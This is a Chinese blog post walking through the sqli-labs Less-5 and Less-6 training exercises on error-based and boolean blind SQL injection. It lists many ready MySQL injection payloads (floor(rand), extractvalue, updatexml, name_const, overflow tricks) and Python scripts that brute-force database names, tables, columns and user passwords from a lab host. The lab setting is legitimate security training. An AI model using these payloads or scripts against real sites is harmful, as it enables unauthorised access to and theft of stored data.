Sqli-labs 复习 Less05-06 报错型sql盲注 - GET

最新推荐文章于 2022-10-10 09:27:56 发布
最新推荐文章于 2022-10-10 09:27:56 发布
阅读量604 收藏 1
点赞数
分类专栏: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Kevinhanser/article/details/81563473
版权

之前学习了一遍 sqli-labs,这是巩固复习一遍,代码全部手敲,加深印象

Sqli-labs 博客目录

报错型 SQL 盲注

函数讲解

  1. 盲注用到的函数

     rand()  产生一个不固定的0~1的随机数列,加了参数之后会变成固定的伪随机数列
 rand(0),rand(1),当使用一个整数参数时,rand使用该参数作为种子生成一个固定的伪随机数列
 floor  向下取整	floor(2.5) == 2
 count()统计元组的个数
 concat  字符串连接
 extractvalue(最长32位)
 updateXml(最长32位)

    Less-5 使用脚本爆破注入

    Less-6 使用 floor(rand(x)*2) 报错注入

注入方法##

下面以 Less-6(基于报错的sql盲注-双引号)为例进行列举)

  1. 布尔型盲注手法,按位爆破

    1. left()
    2. ascii()、substr()
    3. regexp
    4. ord()、mid()

    ?id=1’and left((select version() limit 0,1),1)=‘s’#

  2. 利用 floor(rand(x)*2) 的执行bug进行报错注入

    ?id=1" union select 1,count(*),concat((你希望的查询语句),floor(rand(0)*2))a from information_schema.columns group by a#

    ?id=1" and (select 1 from(select count(*),concat((你希望的查询语句),floor(rand(0)*2))x from information_schema.tables group by x)a)#

  3. 利用 extractvalue() 函数报错注入(有长度限制,最长32位,mysql 5.0不可用,mysql 5.6可用)

    ?id=1" and extractvalue(1,concat(0x7e,(你希望的查询语句)))#

    ?id=1" and extractvalue(1,concat(0x7e,((select * from(select concat((你希望的查询语句))x from information_schema.tables group by x)a))))#

    ?id=1" and extractvalue(1,concat(0x7e,(database())))#

    ?id=1" and extractvalue(1,concat(0x7e,((select * from(select concat((select username from security.users limit 0,1))x from information_schema.tables group by x)a))))#

  4. 利用 updatexml() 函数报错注入(有长度限制,最长32位)

    ?id=1" and updatexml(1,concat(0x7e,(你希望的查询语句),0x7e),1)#

  5. 利用 name_const 数据的重复性(低版本可用,mysql 5.0可用,mysql 5.6不可用 )

    ?id=1" union select 1,2,3 from (select name_const((你希望的查询语句),1),name_const((你希望的查询语句),1))x #

    ?id=1" and exists(select * from (select * from(select name_const((你希望的查询语句),0))a join(select name_const((你希望的查询语句),0))b)c)#

  6. 利用 double 数值类型超出范围进行报错注入

    ?id=1" union select (exp(~(select * from(select user())a))),2,3#

    未测试成功

  7. 利用 bigint 溢出进行报错注入(这些溢出错误会导致MySQL版本5.5.5及以上)

    基于 bigint 溢出错误的SQL注入( https://www.cnblogs.com/lcamry/articles/5509112.html)

    未测试成功

    ?id=1" union select (!(select * from (select user())x) - ~0),2,3#

    下面为句式:

    !(select*from(select user())x)-~0

    (select(!x-~0)from(select(select user())x)a)

    (select!x-~0.from(select(select user())x)a)

    select ~0+!(select*from(select user())x)

  8. 一个句式组合:

    (select * from(select concat((你希望的查询语句))x from information_schema.tables group by x)a)

    遇到无法使用 select * from * 查询的时候,可以使用这个万能句式,代替下面的“你希望的查询语句”

     ?id=1" and (select 1 from(select count(*),concat((你希望的查询语句),floor(rand(0)*2))x from information_schema.tables group by x)a)#
 
 ?id=1" and extractvalue(1,concat(0x7e,(你希望的查询语句)))#
 
 ?id=1" and updatexml(1,concat(0x7e,(你希望的查询语句),0x7e),1)#
 
 ?id=1" and exists(select * from (select * from(select name_const((你希望的查询语句),0))a join(select name_const((你希望的查询语句),0))b)c)#
 		
 ?id=1" union select 1,2,3 from (select name_const((你希望的查询语句),1),name_const((你希望的查询语句),1))x #
 
 ?id=1" union select (exp(~(select * from(select user())a))),2,3#
 
 and so on...

Less-5 基于错误的sql盲注-单引号

  1. 测试

     ?id=1	正常
 ?id=1"	正常
 ?id=1'	报错
 下面使用布尔的 SQL 盲注

  2. 猜数据库的版本

     ?id=1'and left(version(),1)=4--+
 ?id=1'and left(version(),1)=5--+
 # 结果为 5.0.51a3ubuntu5

    脚本运行

     # -*- coding: utf-8 -*-
 # filename:Less05-1 database_version.py

 import hackhttp
 import re
 		
 def database_version(arg):
 	print "database_version start test..."
 	payloads = list('abcdefghijklmnopqrstuvwxyz0123456789@_.')
 	version=""
 	for i in range(1,20):
 		for j in payloads:
 			hh = hackhttp.hackhttp()
 			msg = "1%27and%20mid(version(),{i},1)=%27{j}%27--+".format(i=i,j=j)
 			code, head, body, redirect_url, log = hh.http(arg+msg)            
 			count = re.findall("You are in",body)
 			if 'You are in' in count:
 				version+=j
 				print "第%s位是%s" % (i,j)
 				break
 	print "数据库的版本为: {version}".format(version=version)
 	
 if __name__ == '__main__':
 	database_version('http://10.10.10.137/sqli-labs/Less-5/?id=')

  3. 猜数据库的长度

     ?id=1'and length(database())=7--+
 ?id=1'and length(database())=8--+
 # 结果为 8

    脚本运行

     # -*- coding: utf-8 -*-
 # filename:Less05-2 database_length.py

 import hackhttp
 import re
 		
 def database_length(arg):
 	print "database_length start test..."
 	length=""
 	for j in range(1,20):
 		hh = hackhttp.hackhttp()
 		msg = "1%27and%20length(database())={j}--+".format(j=j)
 		code, head, body, redirect_url, log = hh.http(arg+msg)            
 		count = re.findall("You are in",body)
 		if 'You are in' in count:
 			length=j
 			break
 	print "数据库的长度为: {length}".format(length=length)
 	
 if __name__ == '__main__':
 	database_length('http://10.10.10.137/sqli-labs/Less-5/?id=')

  4. 猜数据库名

     ?id=1' and mid(database(),1,1)="a"--+
 ?id=1' and mid(database(),1,1)="b"--+
 # 结果为 security

    脚本运行

     # -*- coding: utf-8 -*-
 # filename:Less05-3 database_name.py

 import hackhttp
 import re
 		
 def database_name(arg):
 	print "database_name start test..."
 	payloads = list('abcdefghijklmnopqrstuvwxyz0123456789@_.')
 	name=""
 	for i in range(1,20):
 		for j in payloads:
 			hh = hackhttp.hackhttp()
 			msg = "1%27and%20mid(database(),{i},1)=%27{j}%27--+".format(i=i,j=j)
 			code, head, body, redirect_url, log = hh.http(arg+msg)            
 			count = re.findall("You are in",body)
 			if 'You are in' in count:
 				name+=j
 				print "第%s位是%s" % (i,j)
 				break
 	print "数据库的版本为: {name}".format(name=name)
 	
 if __name__ == '__main__':
 	database_name('http://10.10.10.137/sqli-labs/Less-5/?id=')

  5. 猜表名

    ?id=1’and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=80–+

    ?id=1’and ascii(substr((select table_name from information_schema.tables where table_schema=0x7365637572697479 limit 0,1),1,1))=81–+

    ?id=1’and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),1,1))=80–+

    ?id=1’and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),2,1))=80–+

    结果为 emails, ussers

    运行脚本

     # -*- coding: utf-8 -*-
 # filename:Less05-4 table_name.py

 import hackhttp
 import re
 		
 def table_name(arg):
 	print "table_name start test..."
 	payloads = list('abcdefghijklmnopqrstuvwxyz0123456789@_.')
 	table_name=""
 	database_name=""
 	for k in range(10):
 		for i in range(1,10):
 			for j in range(65,122):
 				hh = hackhttp.hackhttp()
 				msg = "1%27and%20ascii(substr((select%20table_name%20from%20information_schema.tables%20where%20table_schema=0x7365637572697479%20limit%20{k},1),{i},1))={j}--+".format(k=k,i=i,j=j)
 				code, head, body, redirect_url, log = hh.http(arg+msg)            
 				count = re.findall("You are in",body)
 				if 'You are in' in count:
 					table_name+=chr(j)
 					#database_name+=str(k+1)
 					print "第%s个表的第%s位的ASCII码值是%s" % (k+1,i,j)
 					break
 		table_name+=" "
 	print "security 数据库的表名为: {table_name}".format(table_name=table_name)
 	
 if __name__ == '__main__':
 	table_name('http://10.10.10.137/sqli-labs/Less-5/?id=')

  6. 猜列名

    ?id=1’and 1=(select 1 from information_schema.columns where table_name=‘users’ and column_name regexp ‘^pass’ limit 0,1)–+

    ?id=1’and ascii(substr((select column_name from information_schema.columns where table_name=0x7573657273 limit 0,1),1,1))>65–+

    ?id=1’and ascii(substr((select column_name from information_schema.columns where table_name=0x7573657273 limit 1,1),1,1))>65–+

    结果为 id username password

    执行脚本

     # -*- coding: utf-8 -*-
 # filename:Less05-5 column_name.py

 import hackhttp
 import re
 		
 def column_name(arg):
 	print "column_name start test..."
 	payloads = list('abcdefghijklmnopqrstuvwxyz0123456789@_.')
 	column_name=""
 	for k in range(10):
 		for i in range(1,15):
 			for j in range(65,122):
 				hh = hackhttp.hackhttp()
 				msg = "1%27and%20ascii(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name=0x7573657273%20limit%20{k},1),{i},1))={j}--+".format(k=k,i=i,j=j)
 				code, head, body, redirect_url, log = hh.http(arg+msg)
 				count = re.findall("You are in",body)
 				if 'You are in' in count:
 					column_name+=chr(j)
 					print "第%s个列的第%s位的ASCII码值是%s" % (k+1,i,j)
 					break
 		column_name+=" "
 	print "security 数据库的 user 表的列名为: {column_name}".format(column_name=column_name)
 	
 if __name__ == '__main__':
 	column_name('http://10.10.10.137/sqli-labs/Less-5/?id=')

  7. 猜数据

    ?id=1’ and ord(mid((select ifnull(cast(username as char),0x20)from security.users order by id LIMIT 0,1),1,1))=68–+

    ?id=1’and ascii(substr((select username from security.users limit 0,1),1,1))=68–+

    执行脚本

     # -*- coding: utf-8 -*-
 # filename:Less05-5 data.py

 import hackhttp
 import re
 		
 def data(arg):
 	print "data start test..."
 	payloads = list('abcdefghijklmnopqrstuvwxyz0123456789@_.')
 	username=""
 	password=""
 	for k in range(14):
 		for i in range(1,15):
 			for j in range(48,122):
 				hh = hackhttp.hackhttp()
 				username_msg = "1%27and%20ascii(substr((select%20username%20from%20security.users%20%20limit%20{k},1),{i},1))={j}--+".format(k=k,i=i,j=j)
 				password_msg = "1%27and%20ascii(substr((select%20password%20from%20security.users%20%20limit%20{k},1),{i},1))={j}--+".format(k=k,i=i,j=j)
 				code, head, body, redirect_url, log = hh.http(arg+username_msg)
 				code, head, body, redirect_url, log = hh.http(arg+password_msg)
 				username_count = re.findall("You are in",body)
 				password_count = re.findall("You are in",body)
 				if 'You are in' in username_count:
 					username+=chr(j)
 					print "username第%s个数据的第%s位的ASCII码值是%s" % (k+1,i,j)
 				if 'You are in' in password_count:
 					password+=chr(j)
 					print "password第%s个数据的第%s位的ASCII码值是%s" % (k+1,i,j)
 					break

 		username+=" "
 		password+=" "
 	print "security 数据库的 user 表的username为: {username}".format(username=username)
 	print "security 数据库的 user 表的password为: {password}".format(password=password)
 	
 if __name__ == '__main__':
 	data('http://10.10.10.137/sqli-labs/Less-5/?id=')

Less-6 基于错误的sql盲注-双引号

floor(rand(x)*2) - SQL报错型盲注教程(原理全剖析( https://blog.csdn.net/qq_35544379/article/details/77453019 ))

牛人推论:对于一个整数x,对于floor(rand(x)*2)产生的序列,如果在未出现“0011”或“1100”序列前出现“0010“或”1101”,那么该floor(rand(x)*2)产生的序列可用于报错型sql盲注

  1. 测试

     ?id=1	正常
 ?id=1'	正常
 ?id=1"	报错

    下面使用基于报错的 SQL 盲注

    公式:

    ?id=1’ union select 1,count(*),concat((你希望的查询语句),floor(rand(0)*2))a from information_schema.columns group by a–+

    例如:

    ?id=1" union select 1,count(*),concat(database(),floor(rand(0)*2))a from information_schema.tables group by a–+

    ?id=1" union select 1,count(*),concat(@@version,floor(rand(0)*2))a from information_schema.tables group by a–+

    ?id=1" union select 1,count(*),concat((select table_name from information_schema.tables where table_schema=‘security’ limit 0,1),floor(rand(0)*2))a from information_schema.tables group by a–+

    有的时候 union 联合查询无法使用,则可以使用 and

    ?id=1" and (select 1 from(select count(*),concat((你希望的查询语句),floor(rand(0)*2))x from information_schema.tables group by x)a)–+

  2. 猜数据库

    ?id=1" and (select 1 from(select count(*),concat(table_schema,floor(rand(0)*2))x from information_schema.tables group by x)a)–+

    ?id=1" union select 1,count(*),concat(database(),floor(rand(0)*2))a from information_schema.tables group by a–+

  3. 查表的个数

    ?id=1" and (select 1 from(select count(*),concat((select count(table_name) from information_schema.tables where table_schema=‘security’ limit 0,1),0x20,floor(rand(0)*2))x from information_schema.tables group by x)a)–+

    ?id=1" union select 1,count(*),concat((select count(table_name) from information_schema.tables where table_schema=‘security’ limit 0,1),0x20,floor(rand(0)*2))a from information_schema.columns group by a–+

  4. 查表名

    ?id=1" and (select 1 from(select count(*),concat((select table_name from information_schema.tables where table_schema=‘security’ limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)–+

    ?id=1" union select 1,count(*),concat((select table_name from information_schema.tables where table_schema=‘security’ limit 0,1),floor(rand(0)*2))a from information_schema.columns group by a–+

  5. 查列数

    ?id=1" and (select 1 from(select count(*),concat((select count(column_name) from information_schema.columns where table_name=‘users’ and table_schema=‘security’ limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)–+

    ?id=1" union select 1,count(*),concat((select count(column_name) from information_schema.columns where table_schema=‘security’ and table_name=‘users’ limit 0,1),floor(rand(0)*2))a from information_schema.columns group by a–+

  6. 列名

    ?id=1" union select 1,count(*),concat((select column_name from information_schema.columns where table_name=‘users’ and table_schema=‘security’ limit 0,1),floor(rand(0)*2))a from information_schema.columns group by a–+

    ?id=1" union Select 1,count(*),concat((select column_name from information_schema.columns where table_schema=‘security’ and table_name=‘users’ limit 0,1),floor(rand(0)*2))a from information_schema.columns group by a–+

  7. 查数据

    ?id=1" and (select 1 from(select count(*),concat((select concat(username,0x3a,0x20,password) from security. users limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)–+

    ?id=1" union select 1,count(*),concat((select concat(username,0x3a,0x20,password) from security.users limit 0,1),floor(rand(0)*2))a from information_schema.tables group by a–+

网络安全打工人
关注
专栏目录
SQL注入之报错盲注详解
DM766924的博客
09-15 1820
报错显示的原理: 前提:MYSQL报错信息必须能够在页面回显。原理:通过MYSQL一些函数的限制条件让其报错,产生超出预期的结果,且报错信息中包含重要信息。要求:需要能够知道MYSQL中哪些函数有限制条件,利用限制条件进行报错,需要了解函数原理才知道熟悉运用。分类: 基于group by报错注入 基于xpath函数报错注入(5.1.1及以上,extractvalue和updatexml) 基于double数值类超出范围报错注入(5.5.5及以上) 基于bignt溢出报错注入 基于数据重复性报错注入 报
Sqli-labs靶场第11关详解[Sqli-labs-less-11]
最新发布
m0_73615178的博客
02-24 1418
SQL注入的三个条件:①参数可控;(从参数输入就知道参数可控)②参数过滤不彻底导致恶意代码被执行;(需要在测试过程中判断)③参数带入数据库执行。(从网页功能能大致分析出是否与数据库进行交互)利用 order by 来测列数测显位:mysql用1,2,3,4Mysql获取相关数据:一、数据库版本-看是否认符合information_schema查询-version()二、数据库用户-看是否符合root注入攻击-user()三、当前操作系统-看是否支持大小写或文件路径选择-
SQL报错盲注
weixin_30594001的博客
04-14 356
嗯哼,这几天篮球比赛,天天训练,学习都耽搁了,DDCTF做了一会心态就爆炸了,蓝瘦,明天再打一场,希望能赢呢,打完就疯狂继续学习了。今天抽空又做了一些基本的SQL注入题目,墨者学院的一道报错注入的题目,很基础。并且没过滤啥,所以直接肝就完事了。我一开始用了SQLMAP就直接跑了,然后还是锻炼一下手注把。 首先,还是那个页面(最近又用起了火狐,毕竟比Chrome 占用资源少,卡顿少) 然后加...
SQL报错盲注
weixin_30274627的博客
07-29 157
原理 报错注入利用了MySQL的第8652号bug :Bug#8652 group by part of rand() returns duplicate key error来进行的盲注,使得MySQL由于函数的特性返回错误信息,进而我们可以显示我们想要的信息,从而达到注入的效果;当然其他类的数据库也存在相应的问题。 利用 Bug 8652的主要内容就是在使用group by...
Sqli-labs 复习 Less13-14 报错盲注 - POST
kevinhanser
08-11 408
之前学习了一遍 sqli-labs,这是巩固复习一遍,代码全部手敲,加深印象 Sqli-labs 博客目录 报错 SQL 盲注 函数讲解 盲注用到的函数 rand() 产生一个不固定的0~1的随机数列,加了参数之后会变成固定的伪随机数列 rand(0),rand(1),当使用一个整数参数时,rand使用该参数作为种子生成一个固定的伪随机数列 floor 向下取整 ...
sqli-labs Lesson-5(基于错误信息的盲注)详细解析教程
Brad_的博客
10-17 806
OneNote粘贴为图片,还是自己动手试一下比较好。
sqli-labs Less - 62、63、64、65(sqli-labs闯关指南 62、63、64、65)
m0_54899775的博客
12-30 1862
sqli-labs Less - 62、63、64、65(sqli-labs闯关指南 62、63、64、65)
sqli-labs Less-54、55、56、57(sqli-labs闯关指南 54、55、56、57)
m0_54899775的博客
12-29 1643
sqli-labs Less-54、55、56、57(sqli-labs闯关指南 54、55、56、57)
sqli-labs Less-1、Less-9\Less-15 python脚本
ChamZhiZe的博客
12-21 1233
虽然这个很简单,但是还是写个脚本跑一下 Less-1 from http.client import PROCESSING, responses from re import I, T from typing import FrozenSet from bs4.dammit import xml_encoding from bs4.element import ProcessingInstruction import requests import urllib.request from colorama
Sqli-labs靶场详细攻略Less 6-10
qq_41755084的博客
10-10 887
与第五关相似,只是闭合的单引号换为了双引号。
报错盲注原理分析
StriveBen的博客
03-26 702
 前言 众所周知,盲注并不会返回错误信息,使得sql注入的难度提高。而报错注入则是利用了MySQL的第8652号bug :Bug #8652 group by part of rand() returns duplicate key error来进行的盲注,使得MySQL由于函数的特性返回错误信息,进而我们可以显示我们想要的信息,从而达到注入的效果;当然其他类的数据库也存在相应的问题,在此我...
SQLI—labs-master(报错、布尔盲注sql注入)
Hala
04-12 636
第五、六关 说明:此关为报错sql注入,意思是,输入信息只有报的错误信息,即不是像前几关一样,直接显示出来想要的数据 注入思路: 没有正常的输出位,需要的数据通过报错进行输出显示 步骤: 前几步与前几关的思路相同,即先判断出来闭合符,输出列数(order by二分法),然后就要用分组的group by语句将不确定的分组进行打印,那么打印的肯定是错误的,即利用打印出来的错误...
SQL注入4之报错盲注
weixin_56218159的博客
05-27 381
SQL注入之报错盲注详解 报错显示的原理 前提:MYSQL报错信息必须能够在页面回显 原理:通过MYSQL一些函数的限制条件让其报错,产生超出预期的结果,且报错信息中包含重要信息 要求:需要能够知道MYSQL中哪些函数有限制条件,利用限制条件进行报错,需要了解函数原理才知道熟悉运用 分类 》基于group by报错注入 》基于xpath函数报错注入(5.1.1及以上,extractvalue和updatexml) 》基于double数值类超出范围报错注入(5.5.5及以上) 》基于bignt溢出
Sqli-labs Less13-14 报错盲注 - POST
kevinhanser
08-09 417
本文记录 SQL 注入的学习过程,资料为 SQLi SQLi 博客目录 Less - 13: POST - Double Injection - Single Quotes - with twist 测试漏洞 username 输入 admin' password 输入 任意内容 显示报错信息 You have an error in your SQL syntax; ...
sqli-labs Less-6(时间盲注
万丈⾼楼平地起,勿在浮沙筑⾼台学艺不精的安全菜鸡,改行回家养猪了,对博客有疑问欢迎留言,看到一定回
02-02 252
前几篇sql注入文章 sqli-labs Less-1(联合注入、字符注入) sqli-labs Less-2(联合注入、整形注入) sqli-labs Less-3(联合注入、字符注入) sqli-labs Less-4(联合注入、字符注入) sqli-labs Less-5(利用extractvalue进行报错注入) sqli-labs Less-5(双注入) sqli-labs Less-5(布尔盲注) 时间盲注常用函数 sleep()
Sqli-labs6-10 盲注、基于时间,基于报错(附脚本)
Recar的博客
12-13 2702
第六题 双引号双注入和第五题一样的界面单引号,不报错,使用双引号 报错http://localhost/sqli-labs/Less-6/?id=-1"; union select 1 from(select count(*),concat_ws(':',(select version()),floor(rand(0)*2))a from information_schema.tables gro
SQL报错盲注教程(原理全剖析)
热门推荐
Pz_mstr's Blog
08-21 1万+
深入分析基于报错sql盲注原理,解密“公式”的奥秘
SQL注入之报错盲注(墨者学院)
waxcj的博客
05-02 2970
首先我们先来了解一下报错注入的基本概念 1:报错注入定义 报错注入就是利用了数据库的某些机制,人为地制造错误条件,使得查询结果能够出现在错误信息中。 2:报错注入前提 页面上没有回显点,但是必须有SQL语句执行错误的信息。 3:报错注入优缺点 优点:不需要显示位,如果有显示位建议使用union联合查询。 缺点:需要有SQL语句的报错信息。 4:构造报错注入的基本步骤 构造目标查询语句 选择报错注入函数 构造报错注入语句 拼接报错注入语句 5:常见的报错注入函数 updatexml(
SQL注入2(报错注入)
嚴 帅的博客
04-25 782
SQL注入(一)https://blog.csdn.net/weixin_43997530/article/details/105627979 报错SQL注入 我们先介绍一下报错SQL注入,报错sql注入sql注入(一)的前三步是一致的,但没有数据的回显位,也就是说即使构造语句成功我们也没有办法看到数据的显示。但是如果sql语句出现错误则可以显示在页面上,我们可以利用这点来构造报错显示...
PHP与Apache环境下部署SQL注入靶场sqli-labs指南
部署sqli-labs是一个实战训练过程,它不仅提供了丰富的SQL注入实例,还能帮助开发者熟悉如何防范此类攻击,是提升网络安全技能的实用工具。通过这个靶场,你将更深入理解Web应用程序安全的重要性,并掌握如何在实际...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值